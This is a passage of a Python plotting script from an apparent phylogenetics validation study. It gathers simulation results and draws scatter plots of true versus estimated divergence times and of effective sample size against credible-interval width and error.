    from each value to its lower and upper bounds.
    """
    n = len(values)
    assert(n == len(lowers))
    assert(n == len(uppers))
    lower_errors = [v - lo for v, lo in zip(values, lowers)]
    upper_errors = [hi - v for v, hi in zip(values, uppers)]
    return [lower_errors, upper_errors]
def _get_validation_sim_dirs(
        validatition_sim_dir,
        suffix,
        include_all_sizes_fixed,
        include_root_size_fixed):
    """Collect sim dirs for one data-set size suffix ("500k" or "100k")."""
    sim_dirs = sorted(glob.glob(os.path.join(
            validatition_sim_dir,
            "03pairs-dpp-root-[0-9][0-9][0-9][0-9]-" + suffix)))
    if include_root_size_fixed:
        sim_dirs.append(os.path.join(
                validatition_sim_dir,
                "03pairs-dpp-root-fixed-" + suffix))
    if include_all_sizes_fixed:
        sim_dirs.append(os.path.join(
                validatition_sim_dir,
                "03pairs-dpp-root-fixed-all-" + suffix))
    return sim_dirs

def _glob_sim_result_paths(sim_dirs, results_file_name):
    """Pair each sim dir's basename with its sorted per-batch result files."""
    paths = []
    for sim_dir in sim_dirs:
        paths.append((
                os.path.basename(sim_dir),
                sorted(glob.glob(os.path.join(
                        sim_dir,
                        "batch00[12345]",
                        results_file_name)))))
    return paths

def get_results_paths(
        validatition_sim_dir,
        include_all_sizes_fixed = True,
        include_root_size_fixed = False,
        include_variable_only = True):
    """Collect validation result paths grouped by data-set size.

    Parameters
    ----------
    validatition_sim_dir : str
        Root directory of the validation simulations. (Name kept — typo
        and all — for backward compatibility with callers.)
    include_all_sizes_fixed : bool
        Also include the "root-fixed-all" sim dirs.
    include_root_size_fixed : bool
        Also include the "root-fixed" sim dirs.
    include_variable_only : bool
        Also include rows for the variable-sites-only results.

    Returns
    -------
    (row_keys, results_batches)
        `row_keys` lists the row labels in plotting order; `results_batches`
        maps each label to a list of (sim_name, result_paths) pairs.
    """
    results_batches = {}
    row_keys = []
    # The 500k and 100k data sets get identical treatment.
    for suffix in ("500k", "100k"):
        sim_dirs = _get_validation_sim_dirs(
                validatition_sim_dir,
                suffix,
                include_all_sizes_fixed,
                include_root_size_fixed)
        results_batches[suffix] = _glob_sim_result_paths(
                sim_dirs, "results.csv.gz")
        row_keys.append(suffix)
        if include_variable_only:
            vo_key = suffix + " variable only"
            results_batches[vo_key] = _glob_sim_result_paths(
                    sim_dirs, "var-only-results.csv.gz")
            row_keys.append(vo_key)
    return row_keys, results_batches
def get_root_1000_500k_results_paths(
        validatition_sim_dir):
    """Collect result paths for only the root-1000 500k validation sims."""
    sim_dirs = sorted(glob.glob(os.path.join(
            validatition_sim_dir,
            "03pairs-dpp-root-1000-500k")))
    batch_paths = []
    for sim_dir in sim_dirs:
        batch_paths.append((
                os.path.basename(sim_dir),
                sorted(glob.glob(os.path.join(
                        sim_dir,
                        "batch00[12345]",
                        "results.csv.gz")))))
    return ["500k"], {"500k": batch_paths}
def get_linked_loci_results_paths(
        validatition_sim_dir,
        data_set_size = "100k",
        include_variable_only = True,
        include_unlinked_only = True):
    """Collect result paths for linked-loci (and optionally unlinked) sims.

    Returns (row_keys, results_batches) keyed by `data_set_size` with
    optional " variable only" and " unlinked only" rows.
    """
    batch_pattern = "batch00[12345]"
    linked_dirs = sorted(glob.glob(os.path.join(
            validatition_sim_dir,
            "03pairs-dpp-root-0100-{0}-*0l".format(data_set_size))))
    all_site_paths = []
    var_only_paths = []
    for sim_dir in linked_dirs:
        sim_name = os.path.basename(sim_dir)
        all_site_paths.append((sim_name, sorted(glob.glob(os.path.join(
                sim_dir, batch_pattern, "results.csv.gz")))))
        var_only_paths.append((sim_name, sorted(glob.glob(os.path.join(
                sim_dir, batch_pattern, "var-only-results.csv.gz")))))
    unlinked_dirs = sorted(glob.glob(os.path.join(
            validatition_sim_dir,
            "03pairs-dpp-root-0100-{0}-*0ul".format(data_set_size))))
    unlinked_paths = []
    for sim_dir in unlinked_dirs:
        unlinked_paths.append((
                os.path.basename(sim_dir),
                sorted(glob.glob(os.path.join(
                        sim_dir, batch_pattern, "results.csv.gz")))))
    s = data_set_size
    results_batches = {
        "{0}".format(s): all_site_paths,
    }
    row_keys = [
        "{0}".format(s),
    ]
    if include_variable_only:
        results_batches["{0} variable only".format(s)] = var_only_paths
        row_keys.append("{0} variable only".format(s))
    if include_unlinked_only:
        results_batches["{0} unlinked only".format(s)] = unlinked_paths
        row_keys.append("{0} unlinked only".format(s))
    return row_keys, results_batches
def get_missing_data_results_paths(
        validatition_sim_dir,
        include_variable_only = True):
    """Collect result paths for the missing-data 500k validation sims.

    Globs all 500k sim dirs and drops those for linked loci (names
    ending in "l") and singleton filtering (ending in "singleton").
    """
    candidate_dirs = sorted(glob.glob(os.path.join(
            validatition_sim_dir,
            "03pairs-dpp-root-0100-500k*")))
    sim_dirs = []
    for d in candidate_dirs:
        if d.endswith("l") or d.endswith("singleton"):
            continue
        sim_dirs.append(d)
    all_site_paths = []
    var_only_paths = []
    for sim_dir in sim_dirs:
        sim_name = os.path.basename(sim_dir)
        all_site_paths.append((sim_name, sorted(glob.glob(os.path.join(
                sim_dir, "batch00[12345]", "results.csv.gz")))))
        var_only_paths.append((sim_name, sorted(glob.glob(os.path.join(
                sim_dir, "batch00[12345]", "var-only-results.csv.gz")))))
    results_batches = {
        "500k": all_site_paths,
    }
    row_keys = [
        "500k",
    ]
    if include_variable_only:
        results_batches["500k variable only"] = var_only_paths
        row_keys.append("500k variable only")
    return row_keys, results_batches
def get_filtered_data_results_paths(
        validatition_sim_dir,
        include_variable_only = True):
    """Collect result paths for the singleton-filtered 500k validation sims.

    The unfiltered 500k dir is placed first, followed by the singleton
    dirs in reverse-sorted order.
    """
    singleton_dirs = sorted(glob.glob(os.path.join(
            validatition_sim_dir,
            "03pairs-dpp-root-0100-500k-*singleton")), reverse = True)
    sim_dirs = [os.path.join(
            validatition_sim_dir,
            "03pairs-dpp-root-0100-500k")] + singleton_dirs
    all_site_paths = []
    var_only_paths = []
    for sim_dir in sim_dirs:
        sim_name = os.path.basename(sim_dir)
        all_site_paths.append((sim_name, sorted(glob.glob(os.path.join(
                sim_dir, "batch00[12345]", "results.csv.gz")))))
        var_only_paths.append((sim_name, sorted(glob.glob(os.path.join(
                sim_dir, "batch00[12345]", "var-only-results.csv.gz")))))
    results_batches = {
        "500k": all_site_paths,
    }
    row_keys = [
        "500k",
    ]
    if include_variable_only:
        results_batches["500k variable only"] = var_only_paths
        row_keys.append("500k variable only")
    return row_keys, results_batches
def ci_width_iter(results, parameter_str):
    """Yield 95% equal-tailed credible-interval widths for a parameter.

    `results` maps column names to parallel lists of string values.
    """
    uppers = results["eti_95_upper_{0}".format(parameter_str)]
    lowers = results["eti_95_lower_{0}".format(parameter_str)]
    for i in range(len(uppers)):
        yield float(uppers[i]) - float(lowers[i])
def absolute_error_iter(results, parameter_str):
    """Yield |true - posterior mean| for each simulation of a parameter.

    `results` maps column names to parallel lists of string values.
    """
    true_values = results["true_{0}".format(parameter_str)]
    mean_values = results["mean_{0}".format(parameter_str)]
    for i in range(len(true_values)):
        yield math.fabs(float(true_values[i]) - float(mean_values[i]))
def _draw_ess_scatter_grid(
        row_keys,
        results_batches,
        parameters,
        get_y_values,
        x_limits,
        y_limits,
        x_label,
        y_label,
        root_alpha_pattern):
    """Draw a grid of ESS-vs-summary scatter panels and return the figure.

    `get_y_values(results, parameter_str)` yields the per-simulation
    y-axis values (e.g. `ci_width_iter` or `absolute_error_iter`);
    `x_limits`/`y_limits` are (min, max) axis pairs.
    """
    plt.close('all')
    fig = plt.figure(figsize = (9, 6.5))
    nrows = len(row_keys)
    # Index through row_keys rather than `results_batches.values()[0]`:
    # dict views are not subscriptable under Python 3, and this is
    # deterministic regardless of dict ordering.
    ncols = len(results_batches[row_keys[0]])
    gs = gridspec.GridSpec(nrows, ncols,
            wspace = 0.0,
            hspace = 0.0)
    for row_idx, row_key in enumerate(row_keys):
        results_batch = results_batches[row_key]
        last_col_idx = len(results_batch) - 1
        for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
            root_alpha_matches = root_alpha_pattern.findall(sim_dir)
            assert(len(root_alpha_matches) == 1)
            root_alpha_setting = root_alpha_matches[0]
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            _LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
                    row_idx, col_idx, sim_dir, len(results_paths)))
            x = []
            y = []
            for parameter_str in parameters:
                # Distinct loop variable avoids shadowing `x`.
                x.extend(float(ess) for ess
                        in results["ess_sum_{0}".format(parameter_str)])
                y.extend(get_y_values(results, parameter_str))
            assert(len(x) == len(y))
            ax = plt.subplot(gs[row_idx, col_idx])
            line, = ax.plot(x, y)
            plt.setp(line,
                    marker = 'o',
                    markerfacecolor = 'none',
                    markeredgecolor = '0.35',
                    markeredgewidth = 0.7,
                    markersize = 2.5,
                    linestyle = '',
                    zorder = 100,
                    rasterized = True)
            ax.set_xlim(x_limits[0], x_limits[1])
            ax.set_ylim(y_limits[0], y_limits[1])
            if row_idx == 0:
                # Column headers describe the root-size prior setting.
                if root_alpha_setting == "fixed-all":
                    pop_sizes = results["mean_pop_size_c1sp1"]
                    assert(len(set(pop_sizes)) == 1)
                    col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
                elif root_alpha_setting == "fixed":
                    col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
                else:
                    root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
                    col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
                ax.text(0.5, 1.015,
                        col_header,
                        horizontalalignment = "center",
                        verticalalignment = "bottom",
                        transform = ax.transAxes)
            if col_idx == last_col_idx:
                ax.text(1.015, 0.5,
                        row_key,
                        horizontalalignment = "left",
                        verticalalignment = "center",
                        rotation = 270.0,
                        transform = ax.transAxes)
    # Show only the outside ticks.
    # NOTE(review): is_last_row/is_first_col/is_first_row are deprecated in
    # newer matplotlib; kept for consistency with the rest of this file.
    for ax in fig.get_axes():
        if not ax.is_last_row():
            ax.set_xticks([])
        if not ax.is_first_col():
            ax.set_yticks([])
    # Show tick labels only for the lower-left plot.
    for ax in fig.get_axes():
        if ax.is_last_row() and ax.is_first_col():
            continue
        ax.set_xticklabels(["" for item in ax.get_xticklabels()])
        ax.set_yticklabels(["" for item in ax.get_yticklabels()])
    # Avoid doubled spines: bottom/right always on, top/left only on the
    # first row/column.
    for ax in fig.get_axes():
        for sp in ax.spines.values():
            sp.set_visible(False)
            sp.set_linewidth(2)
        if ax.is_first_row():
            ax.spines['top'].set_visible(True)
        ax.spines['bottom'].set_visible(True)
        if ax.is_first_col():
            ax.spines['left'].set_visible(True)
        ax.spines['right'].set_visible(True)
    fig.text(0.5, 0.001,
            x_label,
            horizontalalignment = "center",
            verticalalignment = "bottom",
            size = 18.0)
    fig.text(0.005, 0.5,
            y_label,
            horizontalalignment = "left",
            verticalalignment = "center",
            rotation = "vertical",
            size = 18.0)
    gs.update(left = 0.08, right = 0.98, bottom = 0.08, top = 0.97)
    return fig

def plot_ess_versus_error(
        parameters,
        parameter_label = "divergence time",
        plot_file_prefix = None,
        include_all_sizes_fixed = True,
        include_root_size_fixed = False):
    """Plot ESS against CI width and against absolute error for parameters.

    Parses all validation results to establish shared axis limits, then
    writes two PDF scatter grids (ESS vs CI width, ESS vs absolute error)
    into `project_util.VAL_DIR/plots`.
    """
    _LOG.info("Generating ESS vs CI scatter plots for {0}...".format(parameter_label))
    root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
    assert(len(parameters) == len(set(parameters)))
    if not plot_file_prefix:
        plot_file_prefix = parameters[0]
    plot_file_prefix_ci = plot_file_prefix + "-ess-vs-ci-width"
    plot_file_prefix_error = plot_file_prefix + "-ess-vs-error"
    row_keys, results_batches = get_results_paths(project_util.VAL_DIR,
            include_all_sizes_fixed = include_all_sizes_fixed,
            include_root_size_fixed = include_root_size_fixed,
            include_variable_only = True)
    # Very inefficient, but parsing all results to get min/max for parameter
    ess_min = float('inf')
    ess_max = float('-inf')
    ci_width_min = float('inf')
    ci_width_max = float('-inf')
    error_min = float('inf')
    error_max = float('-inf')
    for key, results_batch in results_batches.items():
        for sim_dir, results_paths in results_batch:
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            for parameter_str in parameters:
                ci_widths = tuple(ci_width_iter(results, parameter_str))
                errors = tuple(absolute_error_iter(results, parameter_str))
                ess_min = min(ess_min,
                        min(float(v) for v in results["ess_sum_{0}".format(parameter_str)]))
                ess_max = max(ess_max,
                        max(float(v) for v in results["ess_sum_{0}".format(parameter_str)]))
                ci_width_min = min(ci_width_min, min(ci_widths))
                ci_width_max = max(ci_width_max, max(ci_widths))
                error_min = min(error_min, min(errors))
                error_max = max(error_max, max(errors))
    # Pad all axis limits by 5% of the data range.
    ess_axis_buffer = math.fabs(ess_max - ess_min) * 0.05
    ess_axis_min = ess_min - ess_axis_buffer
    ess_axis_max = ess_max + ess_axis_buffer
    ci_width_axis_buffer = math.fabs(ci_width_max - ci_width_min) * 0.05
    ci_width_axis_min = ci_width_min - ci_width_axis_buffer
    ci_width_axis_max = ci_width_max + ci_width_axis_buffer
    error_axis_buffer = math.fabs(error_max - error_min) * 0.05
    error_axis_min = error_min - error_axis_buffer
    error_axis_max = error_max + error_axis_buffer
    fig = _draw_ess_scatter_grid(
            row_keys,
            results_batches,
            parameters,
            ci_width_iter,
            (ess_axis_min, ess_axis_max),
            (ci_width_axis_min, ci_width_axis_max),
            "Effective sample size of {0}".format(parameter_label),
            "CI width {0}".format(parameter_label),
            root_alpha_pattern)
    plot_dir = os.path.join(project_util.VAL_DIR, "plots")
    if not os.path.exists(plot_dir):
        os.mkdir(plot_dir)
    plot_path = os.path.join(plot_dir,
            "{0}-scatter.pdf".format(plot_file_prefix_ci))
    fig.savefig(plot_path, dpi=600)
    _LOG.info("Plots written to {0!r}\n".format(plot_path))
    _LOG.info("Generating ESS vs error scatter plots for {0}...".format(parameter_label))
    fig = _draw_ess_scatter_grid(
            row_keys,
            results_batches,
            parameters,
            absolute_error_iter,
            (ess_axis_min, ess_axis_max),
            (error_axis_min, error_axis_max),
            "Effective sample size of {0}".format(parameter_label),
            "Absolute error of {0}".format(parameter_label),
            root_alpha_pattern)
    plot_path = os.path.join(plot_dir,
            "{0}-scatter.pdf".format(plot_file_prefix_error))
    fig.savefig(plot_path, dpi=600)
    _LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_scatter_plots(
        parameters,
        parameter_label = "divergence time",
        parameter_symbol = "\\tau",
        plot_file_prefix = None,
        include_all_sizes_fixed = True,
        include_root_size_fixed = False,
        linked_loci = None,
        missing_data = False,
        filtered_data = False,
        include_variable_only = True):
    """Plot true versus estimated values of ``parameters`` across conditions.

    One scatter plot (posterior mean with 95% equal-tailed-interval error
    bars, plus a 1:1 identity line) is drawn per simulation condition,
    arranged in a grid whose rows/columns come from the results-path
    helpers.  At most one of ``linked_loci``, ``missing_data``, or
    ``filtered_data`` may be given to select an alternative set of
    validation results.

    Parameters
    ----------
    parameters : list of str
        Unique result-column suffixes to pool (e.g. divergence-time labels).
    parameter_label : str
        Human-readable text used in the shared axis labels.
    parameter_symbol : str
        LaTeX symbol used in annotations and axis labels.
    plot_file_prefix : str or None
        Output-file prefix; defaults to ``parameters[0]``.

    The figure is written to ``<VAL_DIR>/plots/<prefix>-scatter.pdf``.
    """
    # The three alternative data-set selectors are mutually exclusive.
    if int(bool(linked_loci)) + int(missing_data) + int(filtered_data) > 1:
        raise Exception("Can only specify linked_loci, missing_data, or filtered_data")
    _LOG.info("Generating scatter plots for {0}...".format(parameter_label))
    # Patterns for parsing simulation settings out of directory names.
    root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
    locus_size_pattern = re.compile(r'root-\d+-\d00k-(?P<locus_size>\d+)u?l')
    missing_data_pattern = re.compile(r'root-\d+-\d00k-0(?P<p_missing>\d+)missing')
    filtered_data_pattern = re.compile(r'root-\d+-\d00k-0(?P<p_singleton>\d+)singleton')
    assert(len(parameters) == len(set(parameters)))
    if not plot_file_prefix:
        plot_file_prefix = parameters[0]
    row_keys, results_batches = get_results_paths(project_util.VAL_DIR,
            include_all_sizes_fixed = include_all_sizes_fixed,
            include_root_size_fixed = include_root_size_fixed,
            include_variable_only = include_variable_only)
    if linked_loci:
        row_keys, results_batches = get_linked_loci_results_paths(
                project_util.VAL_DIR,
                data_set_size = linked_loci,
                include_variable_only = include_variable_only,
                include_unlinked_only = True)
    if missing_data:
        row_keys, results_batches = get_missing_data_results_paths(
                project_util.VAL_DIR,
                include_variable_only = include_variable_only)
    if filtered_data:
        row_keys, results_batches = get_filtered_data_results_paths(
                project_util.VAL_DIR,
                include_variable_only = include_variable_only)
    # Very inefficient, but parsing all results to get min/max for the
    # parameter so that every subplot can share the same axis limits.
    parameter_min = float('inf')
    parameter_max = float('-inf')
    for key, results_batch in results_batches.items():
        for sim_dir, results_paths in results_batch:
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            for parameter_str in parameters:
                parameter_min = min(parameter_min,
                        min(float(v) for v in results["true_{0}".format(parameter_str)]))
                parameter_max = max(parameter_max,
                        max(float(v) for v in results["true_{0}".format(parameter_str)]))
                parameter_min = min(parameter_min,
                        min(float(v) for v in results["mean_{0}".format(parameter_str)]))
                parameter_max = max(parameter_max,
                        max(float(v) for v in results["mean_{0}".format(parameter_str)]))
    # Pad the shared axis limits by 5% of the observed range.
    axis_buffer = math.fabs(parameter_max - parameter_min) * 0.05
    axis_min = parameter_min - axis_buffer
    axis_max = parameter_max + axis_buffer
    plt.close('all')
    # Figure dimensions depend on which grid of conditions is plotted.
    if missing_data or filtered_data:
        fig = plt.figure(figsize = (9, 4.0))
    elif linked_loci:
        if include_variable_only:
            fig = plt.figure(figsize = (7.25, 6.5))
        else:
            fig = plt.figure(figsize = (7.25, 4.2))
    else:
        fig = plt.figure(figsize = (9, 6.5))
    nrows = len(results_batches)
    # NOTE: dict views are not indexable in Python 3, so use an iterator
    # instead of `results_batches.values()[0]`.
    ncols = len(next(iter(results_batches.values())))
    gs = gridspec.GridSpec(nrows, ncols,
            wspace = 0.0,
            hspace = 0.0)
    for row_idx, row_key in enumerate(row_keys):
        results_batch = results_batches[row_key]
        last_col_idx = len(results_batch) - 1
        for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
            root_alpha_matches = root_alpha_pattern.findall(sim_dir)
            assert(len(root_alpha_matches) == 1)
            root_alpha_setting = root_alpha_matches[0]
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            _LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
                    row_idx, col_idx, sim_dir, len(results_paths)))
            # Pool true values, posterior means, and 95% ETI bounds across
            # all requested parameters.
            x = []
            y = []
            y_upper = []
            y_lower = []
            for parameter_str in parameters:
                x.extend(float(v) for v in results["true_{0}".format(parameter_str)])
                y.extend(float(v) for v in results["mean_{0}".format(parameter_str)])
                y_lower.extend(float(v) for v in results["eti_95_lower_{0}".format(parameter_str)])
                y_upper.extend(float(v) for v in results["eti_95_upper_{0}".format(parameter_str)])
            assert(len(x) == len(y))
            assert(len(x) == len(y_lower))
            assert(len(x) == len(y_upper))
            proportion_within_ci = pycoevolity.stats.get_proportion_of_values_within_intervals(
                    x,
                    y_lower,
                    y_upper)
            rmse = pycoevolity.stats.root_mean_square_error(x, y)
            _LOG.info("p(within CI) = {0:.4f}".format(proportion_within_ci))
            _LOG.info("RMSE = {0:.2e}".format(rmse))
            ax = plt.subplot(gs[row_idx, col_idx])
            # Scatter of estimates vs truth with 95% CI error bars.
            ax.errorbar(
                    x = x,
                    y = y,
                    yerr = get_errors(y, y_lower, y_upper),
                    ecolor = '0.65',
                    elinewidth = 0.5,
                    capsize = 0.8,
                    barsabove = False,
                    marker = 'o',
                    linestyle = '',
                    markerfacecolor = 'none',
                    markeredgecolor = '0.35',
                    markeredgewidth = 0.7,
                    markersize = 2.5,
                    zorder = 100,
                    rasterized = True)
            ax.set_xlim(axis_min, axis_max)
            ax.set_ylim(axis_min, axis_max)
            # 1:1 identity line for reference.
            identity_line, = ax.plot(
                    [axis_min, axis_max],
                    [axis_min, axis_max])
            plt.setp(identity_line,
                    color = '0.7',
                    linestyle = '-',
                    linewidth = 1.0,
                    marker = '',
                    zorder = 0)
            # Annotate CI coverage and RMSE in the upper-left corner.
            ax.text(0.02, 0.97,
                    "\\scriptsize\\noindent$p({0:s} \\in \\textrm{{\\sffamily CI}}) = {1:.3f}$".format(
                            parameter_symbol,
                            proportion_within_ci),
                    horizontalalignment = "left",
                    verticalalignment = "top",
                    transform = ax.transAxes,
                    size = 6.0,
                    zorder = 200)
            ax.text(0.02, 0.87,
                    "\\scriptsize\\noindent RMSE = {0:.2e}".format(
                            rmse),
                    horizontalalignment = "left",
                    verticalalignment = "top",
                    transform = ax.transAxes,
                    size = 6.0,
                    zorder = 200)
            if row_idx == 0:
                # Column headers describe the simulation condition, parsed
                # from the simulation directory name.
                if linked_loci:
                    locus_size_matches = locus_size_pattern.findall(sim_dir)
                    assert len(locus_size_matches) == 1
                    locus_size = int(locus_size_matches[0])
                    col_header = "$\\textrm{{\\sffamily Locus length}} = {0}$".format(locus_size)
                elif missing_data:
                    percent_missing = 0.0
                    missing_matches = missing_data_pattern.findall(sim_dir)
                    if missing_matches:
                        assert len(missing_matches) == 1
                        percent_missing = float("." + missing_matches[0]) * 100.0
                    col_header = "{0:.0f}\\% missing data".format(percent_missing)
                elif filtered_data:
                    percent_sampled = 100.0
                    filtered_matches = filtered_data_pattern.findall(sim_dir)
                    if filtered_matches:
                        assert len(filtered_matches) == 1
                        percent_sampled = float("." + filtered_matches[0]) * 100.0
                    col_header = "{0:.0f}\\% singleton patterns".format(percent_sampled)
                else:
                    if root_alpha_setting == "fixed-all":
                        pop_sizes = results["mean_pop_size_c1sp1"]
                        assert(len(set(pop_sizes)) == 1)
                        col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
                    elif root_alpha_setting == "fixed":
                        col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
                    else:
                        root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
                        col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
                ax.text(0.5, 1.015,
                        col_header,
                        horizontalalignment = "center",
                        verticalalignment = "bottom",
                        transform = ax.transAxes)
            if col_idx == last_col_idx:
                # Row labels go along the right edge of the grid.
                ax.text(1.015, 0.5,
                        row_key,
                        horizontalalignment = "left",
                        verticalalignment = "center",
                        rotation = 270.0,
                        transform = ax.transAxes)
    # show only the outside ticks
    all_axes = fig.get_axes()
    for ax in all_axes:
        if not ax.is_last_row():
            ax.set_xticks([])
        if not ax.is_first_col():
            ax.set_yticks([])
    # show tick labels only for lower-left plot
    all_axes = fig.get_axes()
    for ax in all_axes:
        if ax.is_last_row() and ax.is_first_col():
            continue
        xtick_labels = ["" for item in ax.get_xticklabels()]
        ytick_labels = ["" for item in ax.get_yticklabels()]
        ax.set_xticklabels(xtick_labels)
        ax.set_yticklabels(ytick_labels)
    # avoid doubled spines
    all_axes = fig.get_axes()
    for ax in all_axes:
        for sp in ax.spines.values():
            sp.set_visible(False)
            sp.set_linewidth(2)
        if ax.is_first_row():
            ax.spines['top'].set_visible(True)
            ax.spines['bottom'].set_visible(True)
        else:
            ax.spines['bottom'].set_visible(True)
        if ax.is_first_col():
            ax.spines['left'].set_visible(True)
            ax.spines['right'].set_visible(True)
        else:
            ax.spines['right'].set_visible(True)
    # Shared axis labels for the whole figure.
    fig.text(0.5, 0.001,
            "True {0} (${1}$)".format(parameter_label, parameter_symbol),
            horizontalalignment = "center",
            verticalalignment = "bottom",
            size = 18.0)
    fig.text(0.005, 0.5,
            "Estimated {0} ($\\hat{{{1}}}$)".format(parameter_label, parameter_symbol),
            horizontalalignment = "left",
            verticalalignment = "center",
            rotation = "vertical",
            size = 18.0)
    # Margins tuned per figure layout.
    if linked_loci:
        if include_variable_only:
            gs.update(left = 0.11, right = 0.97, bottom = 0.08, top = 0.97)
        else:
            gs.update(left = 0.11, right = 0.97, bottom = 0.13, top = 0.95)
    elif missing_data or filtered_data:
        gs.update(left = 0.09, right = 0.98, bottom = 0.1, top = 0.96)
    else:
        gs.update(left = 0.08, right = 0.98, bottom = 0.08, top = 0.97)
    plot_dir = os.path.join(project_util.VAL_DIR, "plots")
    if not os.path.exists(plot_dir):
        os.mkdir(plot_dir)
    plot_path = os.path.join(plot_dir,
            "{0}-scatter.pdf".format(plot_file_prefix))
    plt.savefig(plot_path, dpi=600)
    _LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_root_1000_500k_scatter_plots(
        parameters,
        parameter_label = "divergence time",
        parameter_symbol = "\\tau",
        plot_file_prefix = None):
    """Plot a single true-vs-estimated scatter plot for the root-1000,
    500k-site validation analyses.

    parameters : list of str
        Unique result-column suffixes to pool into one plot.
    parameter_label : str
        Human-readable text used in the axis labels.
    parameter_symbol : str
        LaTeX symbol used in annotations and axis labels.
    plot_file_prefix : str or None
        Output-file prefix; defaults to ``parameters[0]``.

    Writes ``<VAL_DIR>/plots/root-1000-500k-<prefix>-scatter.pdf``.
    """
    _LOG.info("Generating scatter plots for {0}...".format(parameter_label))
    # Pattern for parsing the root-size prior setting from directory names.
    root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
    assert(len(parameters) == len(set(parameters)))
    if not plot_file_prefix:
        plot_file_prefix = parameters[0]
    row_keys, results_batches = get_root_1000_500k_results_paths(project_util.VAL_DIR)
    # Very inefficient, but parsing all results to get min/max for parameter
    # so both axes can share the same limits.
    parameter_min = float('inf')
    parameter_max = float('-inf')
    for key, results_batch in results_batches.items():
        for sim_dir, results_paths in results_batch:
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            for parameter_str in parameters:
                # Track the global min/max over both true and estimated values.
                parameter_min = min(parameter_min,
                        min(float(x) for x in results["true_{0}".format(parameter_str)]))
                parameter_max = max(parameter_max,
                        max(float(x) for x in results["true_{0}".format(parameter_str)]))
                parameter_min = min(parameter_min,
                        min(float(x) for x in results["mean_{0}".format(parameter_str)]))
                parameter_max = max(parameter_max,
                        max(float(x) for x in results["mean_{0}".format(parameter_str)]))
    # Pad the axis limits by 5% of the observed range.
    axis_buffer = math.fabs(parameter_max - parameter_min) * 0.05
    axis_min = parameter_min - axis_buffer
    axis_max = parameter_max + axis_buffer
    plt.close('all')
    fig = plt.figure(figsize = (3.5, 3.0))
    # Single-cell grid; the helper is expected to yield one row/column.
    gs = gridspec.GridSpec(1, 1,
            wspace = 0.0,
            hspace = 0.0)
    for row_idx, row_key in enumerate(row_keys):
        results_batch = results_batches[row_key]
        last_col_idx = len(results_batch) - 1
        for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
            root_alpha_matches = root_alpha_pattern.findall(sim_dir)
            assert(len(root_alpha_matches) == 1)
            root_alpha_setting = root_alpha_matches[0]
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            _LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
                    row_idx, col_idx, sim_dir, len(results_paths)))
            # Pool true values, posterior means, and 95% ETI bounds across
            # all requested parameters.
            x = []
            y = []
            y_upper = []
            y_lower = []
            for parameter_str in parameters:
                x.extend(float(x) for x in results["true_{0}".format(parameter_str)])
                y.extend(float(x) for x in results["mean_{0}".format(parameter_str)])
                y_lower.extend(float(x) for x in results["eti_95_lower_{0}".format(parameter_str)])
                y_upper.extend(float(x) for x in results["eti_95_upper_{0}".format(parameter_str)])
            assert(len(x) == len(y))
            assert(len(x) == len(y_lower))
            assert(len(x) == len(y_upper))
            proportion_within_ci = pycoevolity.stats.get_proportion_of_values_within_intervals(
                    x,
                    y_lower,
                    y_upper)
            rmse = pycoevolity.stats.root_mean_square_error(x, y)
            _LOG.info("p(within CI) = {0:.4f}".format(proportion_within_ci))
            _LOG.info("RMSE = {0:.2e}".format(rmse))
            ax = plt.subplot(gs[row_idx, col_idx])
            # Scatter of estimates vs truth with 95% CI error bars.
            line = ax.errorbar(
                    x = x,
                    y = y,
                    yerr = get_errors(y, y_lower, y_upper),
                    ecolor = '0.65',
                    elinewidth = 0.5,
                    capsize = 0.8,
                    barsabove = False,
                    marker = 'o',
                    linestyle = '',
                    markerfacecolor = 'none',
                    markeredgecolor = '0.35',
                    markeredgewidth = 0.7,
                    markersize = 2.5,
                    zorder = 100,
                    rasterized = True)
            ax.set_xlim(axis_min, axis_max)
            ax.set_ylim(axis_min, axis_max)
            # 1:1 identity line for reference.
            identity_line, = ax.plot(
                    [axis_min, axis_max],
                    [axis_min, axis_max])
            plt.setp(identity_line,
                    color = '0.7',
                    linestyle = '-',
                    linewidth = 1.0,
                    marker = '',
                    zorder = 0)
            # Annotate CI coverage (left) and RMSE (right) above the plot.
            ax.text(0.01, 1.01,
                    "\\normalsize\\noindent$p({0:s} \\in \\textrm{{\\sffamily CI}}) = {1:.3f}$".format(
                            parameter_symbol,
                            proportion_within_ci),
                    horizontalalignment = "left",
                    verticalalignment = "bottom",
                    transform = ax.transAxes,
                    size = 6.0,
                    zorder = 200)
            ax.text(0.99, 1.01,
                    "\\normalsize\\noindent RMSE = {0:.2e}".format(
                            rmse),
                    horizontalalignment = "right",
                    verticalalignment = "bottom",
                    transform = ax.transAxes,
                    size = 6.0,
                    zorder = 200)
